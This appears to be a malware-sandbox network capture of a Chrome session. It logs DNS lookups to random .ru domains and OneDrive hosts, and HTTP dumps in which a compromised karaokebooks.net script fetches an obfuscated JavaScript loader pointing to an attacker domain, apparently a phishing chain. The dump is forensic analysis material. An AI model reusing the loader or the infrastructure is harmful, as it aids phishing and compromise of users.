                                                                                                                              Dec 4, 2024 21:15:54.195501089 CET1.1.1.1192.168.2.40x1534No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:54.428560972 CET1.1.1.1192.168.2.40xb89cNo error (0)h6n.xswpbsmx.ru172.67.164.164A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:54.428560972 CET1.1.1.1192.168.2.40xb89cNo error (0)h6n.xswpbsmx.ru104.21.74.239A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:54.429822922 CET1.1.1.1192.168.2.40x2429No error (0)h6n.xswpbsmx.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.233153105 CET1.1.1.1192.168.2.40x904No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.233153105 CET1.1.1.1192.168.2.40x904No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.233153105 CET1.1.1.1192.168.2.40x904No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.233153105 CET1.1.1.1192.168.2.40x904No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.290460110 CET1.1.1.1192.168.2.40x40d7No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.290894985 CET1.1.1.1192.168.2.40x8a8eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.291460991 CET1.1.1.1192.168.2.40x98e1No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.291460991 CET1.1.1.1192.168.2.40x98e1No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.292939901 CET1.1.1.1192.168.2.40x4b8eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:15:58.292939901 CET1.1.1.1192.168.2.40x4b8eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.794516087 CET1.1.1.1192.168.2.40x4115No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.794516087 CET1.1.1.1192.168.2.40x4115No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.794516087 CET1.1.1.1192.168.2.40x4115No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:00.794516087 CET1.1.1.1192.168.2.40x4115No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.213722944 CET1.1.1.1192.168.2.40xfa61No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.213777065 CET1.1.1.1192.168.2.40xc8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.213777065 CET1.1.1.1192.168.2.40xc8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.252726078 CET1.1.1.1192.168.2.40xcf5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.252892017 CET1.1.1.1192.168.2.40x33faNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:02.252892017 CET1.1.1.1192.168.2.40x33faNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:07.010900021 CET1.1.1.1192.168.2.40x6750No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:22.616269112 CET1.1.1.1192.168.2.40xb692No error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:22.616269112 CET1.1.1.1192.168.2.40xb692No error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:22.616508961 CET1.1.1.1192.168.2.40x21eeNo error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.918725014 CET1.1.1.1192.168.2.40x95eeNo error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.918725014 CET1.1.1.1192.168.2.40x95eeNo error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:28.920505047 CET1.1.1.1192.168.2.40x4e0dNo error (0)eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:29.649611950 CET1.1.1.1192.168.2.40xdb20No error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:29.649611950 CET1.1.1.1192.168.2.40xdb20No error (0)odsp-odweb-webfe-lb.eurwesteur107255.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-ceb6f0ee85ee.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:29.766825914 CET1.1.1.1192.168.2.40x95ccNo error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:29.766825914 CET1.1.1.1192.168.2.40x95ccNo error (0)odsp-odweb-webfe-lb.eurwesteur001307.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.299540043 CET1.1.1.1192.168.2.40x4a5dNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.299540043 CET1.1.1.1192.168.2.40x4a5dNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.299540043 CET1.1.1.1192.168.2.40x4a5dNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.299540043 CET1.1.1.1192.168.2.40x4a5dNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.299540043 CET1.1.1.1192.168.2.40x4a5dNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.679218054 CET1.1.1.1192.168.2.40x17c3No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:32.679218054 CET1.1.1.1192.168.2.40x17c3No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:39.006987095 CET1.1.1.1192.168.2.40xcd21No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:39.138864040 CET1.1.1.1192.168.2.40xf30No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:39.277040005 CET1.1.1.1192.168.2.40xe340No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:39.476305008 CET1.1.1.1192.168.2.40xaedNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:42.037033081 CET1.1.1.1192.168.2.40x5fceNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:42.037312984 CET1.1.1.1192.168.2.40x8d0aNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:43.170198917 CET1.1.1.1192.168.2.40x4f4cNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:43.265933037 CET1.1.1.1192.168.2.40xc4aNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:45.482270002 CET1.1.1.1192.168.2.40xf1daNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2024 21:16:45.584886074 CET1.1.1.1192.168.2.40x7b65No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              • karaokebooks.net
                                                                                                                              • cdnjs.cloudflare.com
                                                                                                                              • h6n.xswpbsmx.ru
                                                                                                                              • https:
                                                                                                                                • challenges.cloudflare.com
                                                                                                                                • code.jquery.com
                                                                                                                                • eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru
                                                                                                                                • onedrive.live.com
                                                                                                                              • a.nel.cloudflare.com
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.44973669.49.245.1724433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:51 UTC646OUTGET /res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover HTTP/1.1
                                                                                                                              Host: karaokebooks.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:51 UTC196INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:50 GMT
                                                                                                                              Server: Apache
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                              2024-12-04 20:15:51 UTC1972INData Raw: 37 61 38 0d 0a 20 20 20 20 76 61 72 20 53 6b 65 45 63 56 6b 5a 53 79 68 45 44 61 78 52 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 53 6b 65 45 63 56 6b 5a 53 79 68 45 44 61 78 52 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 53 6b 65 45 63 56 6b 5a 53 79 68 45 44 61 78 52 29 3b 0d 0a 53 6b 65 45 63 56 6b 5a 53 79 68 45 44 61 78 52 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                              Data Ascii: 7a8 var SkeEcVkZSyhEDaxR = document.createElement("script");SkeEcVkZSyhEDaxR.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(SkeEcVkZSyhEDaxR);SkeEcVkZSyhEDaxR.onload=function()


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449737104.17.25.144433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:53 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:53 UTC962INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:53 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 267517
                                                                                                                              Expires: Mon, 24 Nov 2025 20:15:53 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clHTISwBFTsxeyzqXgPkMqdpbJTp7pZg%2FUsfRAo%2BiTOHLTLjaoC6ho6BZhn8xO5eM1zBu4OFX3zMLOUasZnrixTaatna9k%2FUUa%2BkyByy5PtH%2FQYCHBSfau0aq52nVKpt5ot801zk"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78967b050cb0-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:15:53 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                              Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                              Data Ascii: &(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typ
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75
                                                                                                                              Data Ascii: o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:fu
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72
                                                                                                                              Data Ascii: se(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doPr
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e
                                                                                                                              Data Ascii: 55===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69
                                                                                                                              Data Ascii: 2+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34
                                                                                                                              Data Ascii: >6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38
                                                                                                                              Data Ascii: S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38
